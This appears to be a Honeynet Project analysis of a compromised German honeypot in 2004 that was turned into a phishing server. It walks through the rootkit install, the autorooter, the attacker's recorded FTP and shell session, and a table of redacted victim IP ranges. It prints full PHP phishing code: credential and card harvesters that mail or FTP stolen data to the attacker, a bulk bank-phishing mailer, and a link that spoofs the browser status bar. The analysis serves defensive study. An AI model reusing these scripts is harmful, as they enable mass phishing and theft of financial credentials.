Details of German compromise

On November 12, 2004, the Honeynet was connected to the Internet. During the time between the start up and November 22, nothing special happened. We just observed an enormous number of
packets with destination port 445 which is not critical for the installed Honeypot.

At 1:16 am the Honeypot got compromised by exploiting the WU-FTP daemon. There was no port scan or FTP connection before, the first connect was used to hack the computer which is an indication of an autorooter-tool. Such tools are used to scan whole network ranges for vulnerable machines and attack everything they come across. They just deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu since later on, the attacker used this tool to attack further targets from the Honeypot.

Until 8:21 am there was no activity from the attacker. Probably he started the tool the night before and checked in the morning for successful gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files:

/usr/bin/dir /usr/bin/top /bin/ps
/sbin/ifconfig /usr/bin/slocate /usr/bin/pstree
/bin/netstat /usr/bin/vdir /usr/bin/socklist
/usr/bin/strings /usr/bin/chattr /usr/sbin/lsof

In addition, it install an SSH-daemon on port 255 which was used by the attacker to log on the Honeypot in the following. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" the presence. The rootkit also installs a sniffer to collect login information to other systems. Furthermore, it modifies the init-scripts to ensure that the installed services will start on next reboot and then sends out an information mail about the system status to the attacker. After finishing the installation, the attacker reentered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH-Client for Windows-systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web-pages to update the billing profile update for seller accounts of a large Internet auctions website. The attacker copied this files into the document root of the webserver. The "index.html" start page is a forwarding page to the auctions website. The reason for that is that these PHP pages were incomplete. The attacker edited them, but never finished his work on this files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.

At8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC-Bouncer and started an IRC-Session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same untypical open port 255 with a listening SSH-daemon like the Honeypot had. The attacker also entered another channel and received Operator-rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian.

At6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen-session with a target network as parameter. Then the attacker detached the session and logged off. Later when he came back, he attached the session again to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not realize the intervention, downloaded and installed at 10:40 pm a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or anonymous connections to any other systems. During the honeynet's online time, it was never used.

On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging.

At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished webpages similar to the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. By calling the startup page, you get a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating the similarity of a phishing data entry form to compare to the acutal site can be found here.

The input of this form will be rudimentary checked with the help of a small PHP-script

<em>&lt;?php //chk: if(strlen($userid)&lt;1 || strlen($pass)&lt;1) { echo 'Invalid user/password'; } else { $mesaj = &quot;$userid $pass&quot;; header (&quot;Location:verify.html&quot;); $muie = fopen(&quot;/tmp/User.doc&quot;, &quot;w&quot;); fwrite($muie, $mesaj); fclose($muie); exit(); } ?&gt;</em>
For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggests a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it will be written to the file /tmp/User.doc and the next page will be shown. On this page, the victim is tricked into entering personal information. All input will be checked and if one is not according to the condition, an error page will be shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point.

With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept .dll files as PHP files by default. The attacker forgot to set the "AddType" variable of the Apache server to interpret .dll files with the PHP-engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:

<em>&lt;?php include(&quot;ini.inc&quot;); $mail_header = &quot;From: support@Bank.com&lt;support@Bank.com&gt;\n&quot;; $mail_header .= &quot;Content-Type: text/html\n&quot;; $subject=&quot;Bank Security Department &quot;; $body=loadini(&quot;test.txt&quot;); if (!($fp = fopen(&quot;list.txt&quot;, &quot;r&quot;))) exit(&quot;Unable to open $listFile.&quot;); $i=0; print &quot;Start time is &quot;; print date(&quot;Y:m:d H:i&quot;); print &quot;\n&quot;; while (!feof($fp)) { fscanf($fp, &quot;%s&quot;, $name); $i++; mail($name, $subject, $body, $mail_header); } print &quot;End time is &quot;; print date(&quot;Y:m:d H:i&quot;); print &quot;\n&quot;; print &quot;$i&quot;; print &quot;emails sent.&quot;; print&quot;\n&quot;; ?&gt;</em>
After downloading the test.txt file which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the real target of the comprised link:

Please follow the link below and renew your account information. <br><br> <a href="http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br>

At this point of time we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back and on Decembers 8, 2004, the honeynet went offline for further analysis.

What else did we find?

We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:

<em>&lt;?php session_start(); $log0 = $_POST['CARD_NUMBER']; $log1= $_POST['CVV2']; $log2 = $_POST['MOTHERS_MAIDEN_NAME']; $log3 = $_POST['EMAIL']; $log4 = $_POST['nmc']; $log5 = $_POST['addr']; $log6 = $_POST['cd']; $log7 = $_POST['pin']; $log8 = $_POST['country']; $log9 = $_POST['city']; $log10 = $_POST['state']; $log11 = $_POST['exp']; $log12 = $_POST['user']; $log13 = $_POST['password']; $log14 = $_POST['bankname']; $log15 = $_POST['bankrouting']; $log16 = $_POST['checkingaccount']; $log17 = $_POST['bankacc']; $td = date(&quot;F jS&quot;); $date = date(&quot;d M, Y&quot;); $time = date(&quot;g:i a&quot;); $LogTime = trim(&quot; Date: &quot;.$date.&quot;, Time: &quot;.$time ); mail(&quot;XXXXXX@yahoo.com&quot;, &quot;Bank Results&quot;, &quot;$log0\n$log1\n$log2\n$log3\n$log4\n$log5\n$log6\n $log7\n$log8\n$log9\n$log10\n$log11\n$log12\n$log13\n$log14\n$log15\n$log16\n$log17&quot;); header (&quot;Location: proccessing.html&quot;); exit; ?&gt; </em>
After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found the input will not be checked for reasonable values. Instead, it will be just send to the attacker by mail after using the "Save" button. Furthermore, we found a mailer-script for a US bank which works like the mailer-script. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.

Analysis of German attacker's sessions

This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files.

Screenshot of the rootkit installation:

[image:../../images/rootkit_screenshot.png size=full]

Commands issued by the attacker:

  /usr/sbin/adduser ro
  passwd ro
  0030934040877
  0030934040877
  Changing password for user ro
  passwd: all authentication tokens updated successfully
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  choose
  Name (204.92.xxx.xxx:root): 331 User choose okay, need password.
  a
  530 Login incorrect.
  bye
  Remote system type is UNIX.
  Using binary mode to transfer files.
  221 Goodbye.
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  example
  Name (204.92.xxx.xxx:root): 331 User example okay, need password.
  choose
  230-You are user #14 of 350 simultaneous users allowed.
  230-
  230 Restricted user logged in.
  hash
  pass
  deb
  bin
  Remote system type is UNIX.
  Using binary mode to transfer files.
  Hash mark printing on (1024 bytes/hash mark).
  Passive mode off.
  Debugging on (debug=1).
  ---> TYPE I
  200 Type okay.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  ls
  250 "/cgi-bin/rootkyt" is new cwd.
  ---> TYPE A
  200 Type okay.
  ---> PORT 212,44,161,115,9,136
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt
  -rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/cgi-bin" is new cwd.
  ls
  ---> PORT 212,44,161,115,9,137
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz
  -rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip
  -rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz
  -rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz
  -rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz
  -rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website
  -rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz
  -rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz
  -rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php
  -rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt
  -rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz
  -rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz
  -rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz
  -rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz
  -rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz
  -rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz
  -rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip
  226 Listing completed.
  cd ..
  ---> CWD ..
  ls
  250 "/" is new cwd.
  ---> PORT 212,44,161,115,9,138
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin
  drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www
  226 Listing completed.
  cd www
  ---> CWD www
  ls
  250 "/www" is new cwd.
  ---> PORT 212,44,161,115,9,139
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz
  -rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm
  -rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz
  -rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie
  -rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz
  -rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz
  -rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz
  -rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz
  -rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/" is new cwd.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  250 "/cgi-bin/rootkyt" is new cwd.
  get superwu.tgz
  local: superwu.tgz remote: superwu.tgz
  ---> TYPE I
  200 Type okay.
  ---> PORT 212,44,161,115,9,140
  200 PORT command successful.
  ---> RETR superwu.tgz
  150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
  ##################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
  226 Transfer completed.
  bye
  723128 bytes received in 96.7 secs (7.3 Kbytes/sec)
  ---> QUIT
  221 Goodbye.
  tar xzvf superwu.tgz
  .nr/
  .nr/createdir
  .nr/firewall
  .nr/status
  .nr/clean
  .nr/mailme
  .nr/patch
  .nr/remove
  .nr/replace
  .nr/startfile
  .nr/init
  .nr/sendmail/
  .nr/sendmail/sshd_config
  .nr/sendmail/ssh_host_key
  .nr/sendmail/ssh_random_seed
  .nr/sendmail/sendmail
  .nr/chattr
  .nr/dir
  .nr/du
  .nr/encrypt
  .nr/fix
  .nr/ifconfig
  .nr/killall
  .nr/libproc.so.2.0.6
  .nr/login
  .nr/ls
  .nr/lsof
  .nr/md5sum
  .nr/netstat
  .nr/ps
  .nr/pstree
  .nr/socklist/
  .nr/socklist/Xf/
  .nr/socklist/Xf/fix.c
  .nr/socklist/Xf/fix
  .nr/socklist/Xf/chattr
  .nr/socklist/Xf/socklistx.c
  .nr/socklist/Xf/socklistx
  .nr/socklist/Xf/move
  .nr/socklist/Xf/stringsx.c
  .nr/socklist/Xf/stringsx
  .nr/socklist/socklist
  .nr/socklist/utils/
  .nr/socklist/utils/.siz.c
  .nr/socklist/utils/siz
  .nr/top
  .nr/vdir
  .nr/lg
  .nr/.c
  .nr/.d
  .nr/.p
  .nr/write
  .nr/read
  .nr/cl
  .nr/curatare/
  .nr/curatare/ps
  .nr/curatare/pstree
  .nr/curatare/sshd
  .nr/curatare/clean
  .nr/curatare/chattr
  .nr/curatare/attrib
  setup
  ./setup

German PHP script analysis

In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.

<?php
$errchk=0;
$error = "None";
$badw="fuck pussy dick suck asshole";

//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
    $error="Invalid email address, please re-submit.";
    $errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
    $error="Invalid bank routing number, please re-submit.";
    $errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
    $error="Invalid card validation code, please re-submit.";
    $errchk=4;
}

//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
    $error="Invalid pin number, please re-submit.";
    $errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
    $error="Please enter your full name and re-submit.";
    $errchk=5;
}
else if(strlen($streetaddr)<1){
    $error="Please enter your address and re-submit.";
    $errchk=5;
}
else if(strlen($cityaddr)<1){
    $error="Please enter your city and re-submit.";
    $errchk=5;
}
else if(strlen($mmn)<1){
    $error="Please enter your Mother Maiden Name and re-submit.";
    $errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
    $error="Please enter your Date Of Birth and re-submit.";
    $errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$streetaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$cityaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$mmn)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
    $efile=fopen("/tmp/User.doc","r");
    fscanf($efile,"%s",$userid);
    fscanf($efile,"%s",$pass);
    fclose($efile);
    $timed = date ("l dS of F Y h:i:s A");
    $ip = $_SERVER["REMOTE_ADDR"];
    $message="----------------------------------------------------------------------------
    On $timed the user ($ip) wrote:
    CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";

    $message=$message."UserId - $userid";

    $message=$message."Password - $pass";

    $message=$message."Email - $email";

    $message=$message."Email Password - $emailp";

    $message=$message."Full Name - $username";

    $message=$message."Address - $streetaddr";

    $message=$message."City - $cityaddr";

    $message=$message."State - $stateprovaddr";

    $message=$message."Zip Code - $zipcodeaddr";

    $message=$message."Phone number - $phone";

    $message=$message."Country - $countryaddr";

    $message=$message."CVV - $cvv2";

    $message=$message."Bank Name - $bank";

    $message=$message."Bank Routing # - $bankr
        Checking Account # - $bankc
        Social Security Number - $ssn
        Card PIN Number - $ccp
        Mother's Maiden Name - $mmn
        Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
        Driver Licence Number - $dln";

    mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From:  tzonfi <xxxxxx@xxxxxx.com>\n");

    header ("Location:xxxxISAPI.dll");
    //$muie = fopen("/tmp/eb.txt", "a");
    //fwrite($muie, $message);
    //fclose($muie);
    //include("cc-ftp.php");
    exit();
}
else {
    echo $error;
}
?>

The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:

<em>&lt;?php include(&quot;r-config.php&quot;); </em>// the server login information<em>$fcon = ftp_connect($host); if(@ftp_login($fcon, $user, $pass)) { ftp_put($fcon, $fremote, $flocal, FTP_ASCII); } else { $msg = &quot;Unable to connect to host: $host with user: $user and pass: $pass. Please update me.&quot;; mail (&quot;xxxxxx@xxxxxx&quot;,&quot;Ftpupdate&quot;,&quot;$msg&quot;,&quot;From:jmekeru &lt;xxxxxx@xxxxxx&gt;\n&quot;); } ftp_close($fcon); ?&gt;</em>

Redirected Phishing Victims

In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we we cannot make an educated guess how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.

Count Source IP address range
28 203.186.X
16 80.58.X
13 212.138.X
12 195.175.X
9 61.56.X
9 213.42.X
8 62.220.X
8 200.141.X
8 195.229.X
7 200.207.X
5 200.226.X
5 200.171.X
5 142.32.X
5 133.11.X
4 61.19.X
4 219.249.X
4 203.162.X
4 203.113.X
4 202.129.X
4 201.6.X
4 200.204.X
3 82.129.X
3 66.173.X
3 65.214.X
3 216.189.X
3 212.0.X
3 211.248.X
3 202.175.X
3 200.168.X
3 200.153.X
3 193.95.X
3 193.188.X
3 163.28.X
2 81.192.X
2 81.168.X
2 81.116.X
2 80.55.X
2 80.53.X
2 69.56.X
2 68.167.X
2 67.163.X
2 66.6.X
2 66.250.X
2 66.207.X
2 66.135.X
2 64.139.X
2 63.70.X
2 61.220.X
2 61.179.X
2 61.131.X
2 24.106.X
2 219.148.X
2 218.30.X
2 217.166.X
2 217.14.X
2 216.37.X
2 216.244.X
2 216.108.X
2 213.212.X
2 212.165.X
2 211.75.X
2 210.95.X
2 210.212.X
2 210.193.X
2 210.177.X
2 208.59.X
2 207.250.X
2 203.87.X
2 203.75.X
2 203.233.X
2 203.177.X
2 203.154.X
2 203.147.X
2 202.157.X
2 202.138.X
2 200.68.X
2 200.45.X
2 200.247.X
2 200.216.X
2 200.206.X
2 200.161.X
2 200.14.X
2 196.40.X
2 195.92.X
2 193.251.X
2 168.143.X
2 163.27.X
2 148.244.X
2 148.240.X
2 12.154.X
1 84.9.X
1 84.114.X
1 82.67.X
1 82.194.X
1 82.156.X
1 82.144.X
1 82.112.X
1 82.108.X
1 81.86.X
1 81.193.X
1 81.115.X
1 80.65.X
1 80.51.X
1 80.48.X
1 80.235.X
1 80.191.X
1 80.183.X
1 80.178.X
1 80.15.X
1 80.13.X
1 80.132.X
1 80.108.X
1 69.95.X
1 69.8.X
1 69.88.X
1 69.76.X
1 69.50.X
1 69.26.X
1 69.201.X
1 68.9.X
1 68.95.X
1 68.81.X
1 68.60.X
1 68.255.X
1 68.228.X
1 68.169.X
1 68.164.X
1 68.163.X
1 68.161.X
1 68.153.X
1 68.122.X
1 68.120.X
1 67.50.X
1 67.162.X
1 67.132.X
1 67.10.X
1 67.109.X
1 67.101.X
1 67.100.X
1 66.95.X
1 66.93.X
1 66.8.X
1 66.69.X
1 66.56.X
1 66.30.X
1 66.255.X
1 66.23.X
1 66.228.X
1 66.214.X
1 66.201.X
1 66.178.X
1 66.159.X
1 66.150.X
1 66.147.X
1 66.0.X
1 65.75.X
1 65.69.X
1 65.33.X
1 65.202.X
1 65.198.X
1 65.197.X
1 65.166.X
1 65.115.X
1 65.113.X
1 64.84.X
1 64.7.X
1 64.76.X
1 64.5.X
1 64.39.X
1 64.31.X
1 64.2.X
1 64.26.X
1 64.219.X
1 64.217.X
1 64.205.X
1 64.198.X
1 64.173.X
1 64.167.X
1 64.166.X
1 64.145.X
1 64.132.X
1 64.12.X
1 64.114.X
1 64.105.X
1 63.86.X
1 63.245.X
1 63.209.X
1 63.171.X
1 63.169.X
1 63.167.X
1 63.162.X
1 63.145.X
1 63.134.X
1 62.69.X
1 62.39.X
1 62.252.X
1 62.190.X
1 62.103.X
1 61.62.X
1 61.241.X
1 61.236.X
1 61.222.X
1 61.221.X
1 61.219.X
1 61.218.X
1 61.206.X
1 61.197.X
1 61.17.X
1 61.150.X
1 61.145.X
1 61.138.X
1 4.7.X
1 4.79.X
1 4.60.X
1 4.42.X
1 4.239.X
1 38.5.X
1 38.118.X
1 24.74.X
1 24.28.X
1 24.252.X
1 24.242.X
1 24.220.X
1 24.217.X
1 24.209.X
1 24.175.X
1 24.167.X
1 24.140.X
1 24.13.X
1 24.129.X
1 24.11.X
1 24.117.X
1 24.0.X
1 222.51.X
1 222.35.X
1 222.111.X
1 221.2.X
1 221.142.X
1 220.80.X
1 220.65.X
1 220.255.X
1 220.244.X
1 220.172.X
1 220.135.X
1 220.130.X
1 219.93.X
1 219.89.X
1 219.239.X
1 219.166.X
1 219.163.X
1 219.161.X
1 219.147.X
1 219.142.X
1 219.137.X
1 219.133.X
1 218.93.X
1 218.89.X
1 218.76.X
1 218.5.X
1 218.56.X
1 218.188.X
1 218.157.X
1 218.152.X
1 218.145.X
1 218.144.X
1 218.108.X
1 217.95.X
1 217.84.X
1 217.56.X
1 217.33.X
1 217.172.X
1 217.167.X
1 217.136.X
1 217.128.X
1 216.86.X
1 216.77.X
1 216.43.X
1 216.253.X
1 216.250.X
1 216.246.X
1 216.239.X
1 216.221.X
1 216.191.X
1 216.190.X
1 216.185.X
1 216.161.X
1 216.155.X
1 216.154.X
1 216.153.X
1 216.144.X
1 216.139.X
1 216.135.X
1 216.104.X
1 213.81.X
1 213.56.X
1 213.3.X
1 213.229.X
1 213.199.X
1 213.186.X
1 213.172.X
1 213.164.X
1 213.157.X
1 213.132.X
1 213.121.X
1 212.97.X
1 212.95.X
1 212.55.X
1 212.37.X
1 212.182.X
1 212.112.X
1 211.92.X
1 211.72.X
1 211.57.X
1 211.46.X
1 211.38.X
1 211.251.X
1 211.249.X
1 211.241.X
1 211.23.X
1 211.22.X
1 211.21.X
1 211.184.X
1 211.167.X
1 211.114.X
1 211.108.X
1 210.93.X
1 210.90.X
1 210.83.X
1 210.60.X
1 210.249.X
1 210.187.X
1 210.150.X
1 210.138.X
1 210.104.X
1 210.100.X
1 210.0.X
1 209.88.X
1 209.63.X
1 209.58.X
1 209.250.X
1 209.239.X
1 209.232.X
1 209.226.X
1 209.205.X
1 209.204.X
1 209.195.X
1 209.183.X
1 209.173.X
1 209.113.X
1 208.63.X
1 208.62.X
1 208.42.X
1 208.29.X
1 208.232.X
1 208.203.X
1 208.19.X
1 208.191.X
1 208.190.X
1 208.16.X
1 208.153.X
1 208.147.X
1 207.6.X
1 207.69.X
1 207.44.X
1 207.28.X
1 207.233.X
1 207.212.X
1 207.192.X
1 207.177.X
1 207.152.X
1 207.121.X
1 207.109.X
1 206.205.X
1 206.173.X
1 206.163.X
1 205.208.X
1 205.201.X
1 205.188.X
1 205.145.X
1 204.69.X
1 203.59.X
1 203.51.X
1 203.252.X
1 203.208.X
1 203.199.X
1 203.195.X
1 203.185.X
1 203.172.X
1 203.157.X
1 203.151.X
1 203.145.X
1 203.131.X
1 203.130.X
1 203.121.X
1 203.112.X
1 203.10.X
1 202.85.X
1 202.67.X
1 202.5.X
1 202.58.X
1 202.54.X
1 202.47.X
1 202.39.X
1 202.216.X
1 202.213.X
1 202.174.X
1 202.169.X
1 202.162.X
1 202.159.X
1 202.155.X
1 202.14.X
1 202.130.X
1 202.106.X
1 201.3.X
1 201.2.X
1 201.225.X
1 201.129.X
1 200.87.X
1 200.85.X
1 200.59.X
1 200.40.X
1 200.30.X
1 200.253.X
1 200.251.X
1 200.250.X
1 200.228.X
1 200.212.X
1 200.203.X
1 200.201.X
1 200.182.X
1 200.165.X
1 200.163.X
1 200.158.X
1 200.144.X
1 200.12.X
1 200.119.X
1 200.118.X
1 200.114.X
1 199.80.X
1 199.246.X
1 199.243.X
1 199.203.X
1 199.174.X
1 198.81.X
1 198.248.X
1 198.173.X
1 198.165.X
1 196.33.X
1 195.69.X
1 195.68.X
1 195.61.X
1 195.56.X
1 195.39.X
1 195.222.X
1 195.205.X
1 195.117.X
1 194.78.X
1 194.243.X
1 193.253.X
1 193.170.X
1 192.136.X
1 192.115.X
1 170.154.X
1 168.234.X
1 168.209.X
1 166.114.X
1 165.98.X
1 165.21.X
1 163.23.X
1 163.20.X
1 162.6.X
1 162.39.X
1 159.54.X
1 158.130.X
1 156.110.X
1 155.212.X
1 151.99.X
1 151.195.X
1 149.106.X
1 148.223.X
1 143.248.X
1 142.179.X
1 141.158.X
1 140.131.X
1 138.88.X
1 137.204.X
1 129.44.X
1 128.200.X
1 12.42.X
1 12.176.X
1 12.160.X
1 12.147.X
1 12.101.X